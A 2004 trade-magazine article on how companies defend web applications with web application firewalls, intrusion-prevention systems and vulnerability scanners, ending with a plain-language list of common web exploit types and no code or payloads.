Americas

  • United States
by Paul Desmond

All-out blitz against Web app attacks

How-To
May 17, 200412 mins
HackingNetworkingSecurity

Armed with Web application firewalls, intrusion-protection systems and vulnerability scanners, companies can defend against app-level cyberattacks.

After nearly 20 years of selling software to the financial services industry, Baker Hill decided two years ago to become an application service provider, offering access to its programs over the Web.

To support the new offering, the company built a Web infrastructure using Microsoft technology, including the Internet Information Server (IIS) Web server, Active Directory and SQL Server 2000, says Eric Beasley, senior network administrator for Baker Hill, in Carmel, Ind. That technology choice didn’t sit well with some large clients, who had read about the Nimda and Code Red attacks that targeted Microsoft platforms. “We had clients who ultimately decided they would not do business with us unless we could find a way to secure that Microsoft environment,” Beasley says.

Such concerns are well founded because applicationsfirewalls are doing an adequate job of protecting against common network-layer attacks, and operating system vendors having cleaned up most of their well-known vulnerabilities. “The application layer is increasingly what’s left,” says Scott Blake, vice president of information security for BindView.

are becoming the prime target for cyberattacks. Experts say 

Another reason applications are an attractive target is there’s no shortage of vulnerabilities to go after, and most require little expertise to exploit, says John Pescatore, an analyst at Gartner.

Since 2002, Gartner research shows that 70% of all successful attacks have exploited application vulnerabilities. “If you take into account Slammer, Blaster and others that happened last year, it’s probably up to 90% now,” he says. Pescatore says the problems being exploited fall into two classes: defects for which a patch has been issued (about 35%) and misconfigured applications (65%).

The hacker playbook

Common exploits look for vulnerabilities that can give the attacker root access to server platforms including Microsoft SQL Server, IIS and occasionally Apache Web servers, says Fred Avolio, president of Avolio Consulting.

Among the most dangerous forms of attack is SQL injection, where an attacker puts unexpected SQL commands into a Web application form field. This could let an attacker execute commands on the back-end database server and, potentially, gain administrator rights. Buffer overflow attacks, which simply flood an application with more data than it can handle, likewise can give an attacker the ability to execute commands on a target system.

Other common exploits include cross-site scripting, which Blake says is common in phishing attacks. Cross-site scripting can take various forms, including tricking users into connecting to what appears to be a well-known Web site to collect personal information or taking over a user’s Web session.

Defensive maneuvers

One of the best forms of defense against application-layer attacks is to avoid following the crowd because attackers typically target the most commonly deployed applications. “It’s simply return on investment” from the hacker’s perspective, Blake says. “Deploy less commonly used technology to achieve heterogeneity and become a smaller target.” Similarly, homegrown applications are less likely targets than off-the-shelf programs.

Pescatore is also a proponent of diversity in terms of operating systems and server platforms. “It raises the cost of IT management, but it greatly decreases the odds that you’re going to have a catastrophic outage,” he says.

Another tip is to expose to the Internet only those services that you actually need. Slammer, for example, took advantage of “a lot of SQL Server databases that didn’t need to be exposed to the Internet,” Pescatore says. It’s also a good idea to zone off crucial applications to limit unnecessary exposure to the rest of the corporation. “If a big worm hits my office zone, that’s pretty annoying,” he says. “But if it spreads to the system that schedules the trains, and the trains don’t leave the station, that’s disastrous.”

The zone defense

Douglas Brown, manager of security resources at the University of North Carolina in Chapel Hill, uses an intrusion-prevention appliance from TippingPoint Technologies to segment his network into a dozen zones. Should an infection be introduced into a given zone, the TippingPoint UnityOne 2400 device should keep it contained there, Brown says.

The university was testing the TippingPoint product last August when it was hit by the Welchia worm, which was launched to eradicate the Blaster worm that hit the Internet the previous week. “We saw large parts of our network become unusable, with the exception of the part where we had a TippingPoint unit,” Brown says.

TippingPoint is an example of an intrusion-prevention system (IPS) that relies on a combination of attack signatures and protocol anomaly detection to ward off attacks like Blaster and its variants. At least a month before Blaster, TippingPoint had released a signature to detect any attack against the Remote Procedure Call vulnerability that Blaster (and Welchia) targeted, Brown says.

Unlike intrusion-detection systems (IDS), UnityOne has not given him any problem with false positives, he says. One reason is that the device sits in-line, watching all traffic – an average of 500M bit/sec on one link – and keeping track of entire TCP conversations, to provide context. IDSs such as the freeware Snort typically look only at mirror ports and don’t see all traffic.

Since last summer, Brown has installed UnityOne throughout campus. “The ROI for us is it has stopped major incidents from impacting our network,” he says. When the Witty worm struck in March, the TippingPoint unit blocked 50,000 packets per hour, making the worm “basically a non-event on this campus,” he says.

Basic blocking and tackling

Another class of product, often called Web application firewalls, seeks to protect applications by only allowing what it deems is legitimate traffic. Brown is testing one such device, from Covelight Systems, while Baker Hill’s Beasley has deployed another, from Teros (formerly Stratum8 Networks). (See review)

The Teros Secure Application Gateway “learns” what constitutes normal application behavior and creates rules that define acceptable application use. By default, traffic that does not meet those rules is dropped, Beasley says. If an intruder attempts to inject SQL commands, for example, the Gateway will recognize that as traffic that is outside the norm and disallow it.

“The upside is we no longer have to evaluate patches and hot fixes from Microsoft immediately,” Beasley says. “We still do the evaluation process and apply them to our environment, but only after we’ve had time to make sure the patch doesn’t break our Web servers or applications.”

The Teros Gateway also has a Secure Sockets Layer (SSL) acceleration card that offloads CPU-intensive encryption and decryption tasks from Baker Hill’s Web servers. “That allows us to run fewer Web servers than we might otherwise require,” Beasley says. Another benefit is that only one SSL certificate is required, instead of one for each Web server.

Unlike some of the other Web application firewalls Beasley evaluated before making his selection nearly two years ago, Teros lets one appliance run profiles and rule sets specific to different Web applications. One rule forces all visitors to start their session at the logon page, which helps to reduce “forceful browsing,” in which an intruder tries to jump to various parts of the site.

The fear with a Web application firewall – or any device that automatically blocks traffic – is that it might block legitimate traffic. Baker Hill goes to great lengths to prevent that scenario, including using the Teros device in its quality assurance department for testing. It also has the device installed at its disaster-recovery site, where it performs still further testing before putting any new application into production.

The strategy is working well enough that Baker Hill has taken its IDS out of production. “I was sick of it constantly crying wolf,” Beasley says. Another big problem he had with the IDS, similar to UNC’s Brown, is that it has trouble seeing all traffic on a fully switched network. You can try to do taps and use mirror ports and on and on, but in the end, “It doesn’t work,” he says.

Pescatore sees different roles for IPS devices and Web application firewalls. The latter, from vendors including Teros, Sanctum, NetContinuum and Kavado, are good at protecting Web servers and applications, but not so good at protecting against worms such as Blaster and Slammer that target specific vulnerabilities. That’s the strong point of IPS devices from vendors including TippingPoint, Network Associates (which acquired IntruVert Networks), NetScreen Technologies, Check Point (InterSpect) and Internet Security Systems, with its Proventia line.

By 2006, Pescatore thinks the IPS function will be incorporated into next-generation firewalls.

The prevent defense

Another tactic is the use of vulnerability scanners during the application development process to catch problems before they are exposed to the world. Initially, customers bought products such as SPI Dynamics’ WebInspect and Kavado’s ScanDo to scan production Web applications. Customers quickly realized that scanning applications during development would nip problems in the bud, and vendors stepped up with interfaces that made their products simple enough for developers to use.

“We put out a research note over a year ago saying it’s time for companies to move vulnerability testing up the food chain,” Pescatore says. “For the clients that have gone that way, it’s proven to be very effective.”

Avolio agrees, noting it’s easy to make mistakes when writing code. A simple typo might not prevent code from compiling and running, but it could create a security vulnerability. An automatic scanner will likely catch it, whereas a manual code review might not, he says.

John Dias is certainly a believer in doing vulnerability testing early and often. The senior security analyst with the Computer Incident Advisory Capability (CIAC), which provides incident response for 105 U.S. Department of Energy sites, has conducted penetration tests since 1989. As successful intrusions on Web applications began to creep up about two years ago, he started evaluating vulnerability-testing tools.

Late last year, he evaluated KaVaDo’s ScanDo and was immediately sold because it is effective at finding vulnerabilities and it’s simple to use. Previously, only one or two staffers had enough security expertise to conduct penetration tests. “Now we have a way of getting more people into it with a very comprehensive tool,” Dias says.

At the same time, the tests are much faster. A typical Web application of 500 pages might take only a couple of hours to scan, he says, down from three to four days with the previous, manual process. “We used to do it manually, filling out spreadsheets – I don’t know if we ever really finished,” he says. “It’s just crazy without some form of automation.”

CIAC is now conducting a few tests per week. “This is the first time I’ve done vulnerability assessments where the developers themselves are excited about the findings,” he says. “They willingly rewrite sections of code that they were iffy about.”

Web services provide significant motivation for Dias’ interest in ScanDo, which can scan Simple Object Access Protocol formats and compare what the Web service is intended to do with what a human operator can try to get away with. “People are starting to deploy Web services, ready or not, so we’re looking into all the security issues of Web services crossing [Department of Energy] sites.”

London Bridge Group, a London developer of financial services software that also hosts applications for clients, is using SPI’s WebInspect to look for vulnerabilities in its Web programs. In addition to validating whether its applications are secure, the tool helps raise the level of security awareness among its developers, says Mark Johnson, London Bridge chief security officer, who is based in its Atlanta data center.

Developers run WebInspect after initially writing and running their code, then fix any security problems before passing the code to quality assurance for functional testing. “They like the idea that it’ll help them create something that they won’t have to fix six months later when we run the [quality assurance] test,” Johnson says.

At the same time, developers learn how to write more secure code from the feedback that WebInspect gives them. “They may do a trick to pass IDs from one page to another that they think is slick, but it opens a cross-site scripting vulnerability,” he says. If WebInspect catches a problem before it goes into production, and the developer learns the trick isn’t so slick after all, that’s good all around.

It also makes good business sense to catch security problems early rather than spend more money to fix them later. In some instances, it’s a business imperative to meet requirements of new regulations such as the Sarbanes-Oxley Act, which puts increased scrutiny on public companies – and their vendors.

Baker Hill, for example, isn’t a public company and thus isn’t technically subject to Sarbanes-Oxley requirements, but many of its clients are. “We have to meet the requirements or we won’t get their business,” Beasley says.

At the same time, 75% of new clients are asking detailed questions about how Baker Hill secures its Microsoft Web infrastructure, up from about 10% two years ago.

And what of those clients that opted not to do business because of security concerns? Says Beasley, “We went back to them and got their business.”

10 most offensive Web application exploits

Authentication hijacking

Unsecure credential and identity management. Result: Account hijacking and theft of service.

Parameter tampering

Modified data sent to Web server. Result: Attacker gains access to all records in database.

Buffer overflow

Attackers flood server with requests that exceed buffer size. Result: Attackers crash and take control of server.

Command injection

Web app passes malicious commands to back-end server. Result: Attackers gain access to data.

Cookie snooping

Attacker decodes user credentials. Result: Attacker can log on as user and gain access to unauthorized information.

SQL injection

Web app passes malicious command to database. Result: Attacker can modify data.

Cookie poisoning

Attacker manipulates cookies passed from server to browser. Result: Attacker can gain access and modify data.

Cross-site scripting

Malicious code is executed when user clicks on a URL. Result: User credentials and information can be stolen.

Invalid parameters

Malicious data accepted without validation. Result: Attacker can hijack client accounts, steal data.

Forceful browsing

Client accesses unauthirized URL. Result: Attacker accesses off-limit directories.